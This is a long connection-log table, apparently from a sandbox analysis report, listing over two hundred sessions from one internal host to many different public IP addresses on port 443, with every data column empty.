                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15258192.168.2.2347998207.232.97.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15259192.168.2.2344222173.244.201.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15260192.168.2.2335826146.158.48.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15261192.168.2.2349342110.201.219.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15262192.168.2.23520602.183.104.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15263192.168.2.2338624122.238.89.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15264192.168.2.2343534123.152.223.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15265192.168.2.233534862.14.40.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15266192.168.2.2358106213.52.87.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15267192.168.2.233291498.124.241.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15268192.168.2.234656068.205.213.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15269192.168.2.2342682206.244.56.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15270192.168.2.2345286181.185.119.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15271192.168.2.2340584168.145.40.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15272192.168.2.2357678101.16.69.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15273192.168.2.235044887.67.0.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15274192.168.2.2357954129.168.211.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15275192.168.2.2342578197.58.8.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15276192.168.2.2356914136.217.128.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15277192.168.2.2353232151.116.26.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15278192.168.2.235184096.135.181.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15279192.168.2.2337414189.71.147.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15280192.168.2.2342252171.6.227.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15281192.168.2.235389443.141.213.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15282192.168.2.235338899.77.124.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15283192.168.2.2337622193.205.161.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15284192.168.2.2349004199.178.207.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15285192.168.2.2349028209.128.2.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15286192.168.2.2359670161.219.120.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15287192.168.2.23592484.174.250.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15288192.168.2.2354574118.166.222.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15289192.168.2.2347302106.132.16.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15290192.168.2.2342808172.170.154.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15291192.168.2.2339134196.82.107.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15292192.168.2.233305872.136.1.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15293192.168.2.233889484.49.185.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15294192.168.2.235746048.149.106.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15295192.168.2.2343588102.84.172.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15296192.168.2.2334356154.118.32.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15297192.168.2.2337258101.91.21.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15298192.168.2.2353420202.0.8.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15299192.168.2.233491860.131.140.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15300192.168.2.2341882219.209.129.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15301192.168.2.2354680222.194.241.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15302192.168.2.2340150223.74.246.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15303192.168.2.2344172207.43.220.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15304192.168.2.235624241.253.53.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15305192.168.2.2354582197.34.79.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15306192.168.2.2350790210.134.222.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15307192.168.2.2353148152.149.180.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15308192.168.2.235194065.141.43.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15309192.168.2.233793634.81.135.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15310192.168.2.2351136164.173.59.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15311192.168.2.2346580195.197.143.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15312192.168.2.2346942219.181.63.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15313192.168.2.2345792203.138.144.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15314192.168.2.234894413.67.117.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15315192.168.2.2333880193.229.86.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15316192.168.2.2349864112.26.11.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15317192.168.2.234348290.42.107.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15318192.168.2.2352418144.221.200.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15319192.168.2.2349914145.40.150.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15320192.168.2.2334702190.109.178.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15321192.168.2.2349572114.49.196.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15322192.168.2.2340676183.1.80.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15323192.168.2.2339512123.154.212.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15324192.168.2.2351700147.31.142.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15325192.168.2.2348464133.231.236.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15326192.168.2.2356720105.191.140.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15327192.168.2.234344871.32.199.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15328192.168.2.235829098.180.6.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15329192.168.2.2340048130.22.100.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15330192.168.2.2344240118.50.75.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15331192.168.2.2347686176.146.99.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15332192.168.2.234966699.122.165.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15333192.168.2.233341880.87.168.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15334192.168.2.2354580223.214.109.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15335192.168.2.2334804216.155.109.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15336192.168.2.2336970107.24.241.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15337192.168.2.235568235.0.199.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15338192.168.2.2345058207.109.140.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15339192.168.2.2345458102.168.9.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15340192.168.2.2346218157.113.235.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15341192.168.2.235156061.239.123.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15342192.168.2.2349748117.58.217.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15343192.168.2.23518641.112.230.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15344192.168.2.2347130168.113.98.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15345192.168.2.2340514120.52.33.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15346192.168.2.2356022177.112.164.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15347192.168.2.234719489.84.140.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15348192.168.2.234623212.166.150.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15349192.168.2.2358230155.36.61.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15350192.168.2.235817027.124.199.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15351192.168.2.2357076219.184.20.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15352192.168.2.234387295.174.166.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15353192.168.2.234624614.10.59.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15354192.168.2.235240624.38.201.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15355192.168.2.2338242112.237.156.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15356192.168.2.2355560179.230.52.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15357192.168.2.233397869.32.12.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15358192.168.2.2355356133.116.234.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15359192.168.2.23451845.118.69.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15360192.168.2.234304425.52.0.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15361192.168.2.2345762126.177.112.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15362192.168.2.2359164178.94.86.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15363192.168.2.2339762105.253.231.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15364192.168.2.233481285.193.245.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15365192.168.2.2356482160.213.36.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15366192.168.2.2356744216.116.135.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15367192.168.2.2356020136.176.222.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15368192.168.2.2341788105.130.94.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15369192.168.2.235427838.230.46.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15370192.168.2.235644244.252.82.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15371192.168.2.234994817.53.53.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15372192.168.2.2343480101.223.85.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15373192.168.2.235190694.25.37.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15374192.168.2.234351414.28.212.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15375192.168.2.235354865.134.119.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15376192.168.2.23530328.241.112.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15377192.168.2.2354098160.20.189.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15378192.168.2.2359252102.204.232.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15379192.168.2.233546678.28.208.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15380192.168.2.2339142135.139.24.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15381192.168.2.2355970190.232.135.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15382192.168.2.2337118192.46.125.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15383192.168.2.234483244.89.57.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15384192.168.2.233345083.205.1.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15385192.168.2.2353508180.40.236.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15386192.168.2.2337274144.253.47.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15387192.168.2.235588254.120.42.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15388192.168.2.234789681.252.237.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15389192.168.2.233557898.138.224.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15390192.168.2.2339594120.124.235.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15391192.168.2.233869480.18.25.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15392192.168.2.235519066.140.153.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15393192.168.2.2357068133.141.63.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15394192.168.2.235718061.177.155.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15395192.168.2.2337780206.4.195.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15396192.168.2.234506435.166.13.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15397192.168.2.235514643.66.16.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15398192.168.2.2351510138.107.175.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15399192.168.2.2356456144.0.20.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15400192.168.2.2334552187.120.177.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15401192.168.2.2347056134.175.98.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15402192.168.2.2340806141.21.1.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15403192.168.2.2348592106.54.17.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15404192.168.2.2343288209.246.166.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15405192.168.2.2351218189.234.96.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15406192.168.2.234392277.41.14.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15407192.168.2.234583889.70.89.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15408192.168.2.234665283.131.111.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15409192.168.2.2346154180.129.160.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15410192.168.2.2348480146.218.14.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15411192.168.2.2336296111.89.146.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15412192.168.2.2358458175.58.39.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15413192.168.2.234549842.43.11.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15414192.168.2.234880648.1.168.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15415192.168.2.2339790102.73.245.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15416192.168.2.2335684174.122.183.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15417192.168.2.234729827.59.12.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15418192.168.2.2350330199.62.185.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15419192.168.2.234739843.196.14.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15420192.168.2.2352178143.187.209.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15421192.168.2.23412802.100.194.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15422192.168.2.234729249.168.67.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15423192.168.2.235922687.29.185.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15424192.168.2.235521018.111.100.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15425192.168.2.235738896.104.230.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15426192.168.2.2342374138.31.207.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15427192.168.2.235788693.252.48.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15428192.168.2.2357918132.132.23.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15429192.168.2.234075632.207.218.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15430192.168.2.2356516161.54.176.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15431192.168.2.2340314145.116.39.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15432192.168.2.2334962198.0.121.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15433192.168.2.2349798201.97.83.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15434192.168.2.2355552187.9.185.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15435192.168.2.2334146206.217.102.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15436192.168.2.23453261.248.218.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15437192.168.2.2337504156.67.155.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15438192.168.2.2341130176.23.52.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15439192.168.2.236098664.71.78.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15440192.168.2.235775093.57.132.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15441192.168.2.2359256218.107.183.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15442192.168.2.2360884185.194.24.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15443192.168.2.2336460128.144.227.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15444192.168.2.2352986145.118.104.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15445192.168.2.23495008.123.15.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15446192.168.2.2344122178.45.59.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15447192.168.2.235416499.15.137.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15448192.168.2.236059468.191.143.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15449192.168.2.234147682.159.223.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15450192.168.2.234946044.21.37.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15451192.168.2.2335722205.125.82.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15452192.168.2.235883095.147.241.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15453192.168.2.2336790223.21.72.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15454192.168.2.2333220220.233.18.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15455192.168.2.234081460.24.240.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15456192.168.2.233989275.139.79.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15457192.168.2.234752070.184.62.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15458192.168.2.2346712169.45.216.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15459192.168.2.2343660169.192.82.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15460192.168.2.2353832157.164.147.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15461192.168.2.234618436.48.254.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15462192.168.2.233582461.18.220.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15463192.168.2.2333274169.134.40.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15464192.168.2.2343316184.0.241.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15465192.168.2.234262897.231.173.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15466192.168.2.2338816125.40.28.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15467192.168.2.233818014.165.30.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15468192.168.2.234421252.153.197.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15469192.168.2.2334834210.157.15.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15470192.168.2.2345250180.0.111.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15471192.168.2.235938839.247.213.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15472192.168.2.235650867.44.39.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15473192.168.2.2351198189.130.54.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15474192.168.2.2353452167.39.41.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15475192.168.2.233913420.89.86.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15476192.168.2.2355440150.171.131.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15477192.168.2.235570690.81.232.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15478192.168.2.2350494212.166.214.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15479192.168.2.2343302103.92.206.179443
